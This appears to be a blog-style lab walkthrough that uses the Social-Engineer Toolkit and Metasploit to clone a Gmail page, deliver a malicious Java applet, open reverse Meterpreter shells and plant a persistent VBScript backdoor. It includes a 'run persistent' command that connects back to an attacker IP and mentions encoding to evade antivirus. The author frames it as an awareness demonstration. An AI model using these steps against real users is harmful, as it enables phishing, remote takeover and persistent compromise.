Choose 1 for Social-Engineering Attacks.
Choose 2 for Website Attack Vectors.
Choose 1 for Java Applet Attack Method.
Choose 1 for Web Templates.
Choose 2 for gmail.
Choose 2 for Windows Reverse_TCP Meterpreter as the stager.
Choose 2 for shikata ganai encoding for av detection evasion, metasploit encodes the payload 4 times to avoid av detection, for the target machine it has no av, hence encoding is not necessary.
payload is encoded 4 times, however this iteration is far from enough, av can still detect the payload easily. SET makes interoperating with metasploit really easily.
The cloned web server is ready to accept connection from any victim.
In the past I used to click on unknown java popup, as I did not know the implication of clicking it blindly. However if the victim is not cautious and click on this unknown java applet the payload will be uploaded to victim's machine.
This is what happened in attacker's machine if the unknown java is clicked by victim. 2 meterpreter sessions are created.
session -l is to list the available meterpreter sessions.
session -i option is to interact with the chosen meterpreter session.
If the attacker wishes, a cmd.exe can be spawned in a hidden process.
Creating a persistent backdoor
You can choose where you want to plant the backdoor and choose when you want the backdoor to start, and which address to connect to.
run persistent -A -L c:\Users\cyrus\Downloads -U -p 443 -r 192.168.20.13 This command instructs that the backdoor vb script shall be uploaded to c:UserscyrusDownloads, will be activated once user logs in, the vb script will connect back to 192.168.20.13 at tcp port 443.
This is the vb script uploaded to victim's machine from attacker's machine via meterpreter session.
All meterpreter sessions was lost because victim had rebooted his machine.
A meterpreter session 4 is created after user has logged in.
Attacker spawned a cmd.exe on victim's machine.
Modern antivirus program is capable of detecting such backdoor and even prevent the download of the encoded payload into victim’s machine; payload encoded by shikata ganai 4 times is not enough to evade most of the modern antivirus program.
In the past I used to click and execute unknown java applet without knowing the implication. This post is a simple and straight forward lab demonstration to create awareness to people who do not understand the implication of your action when you click on something you do not understand.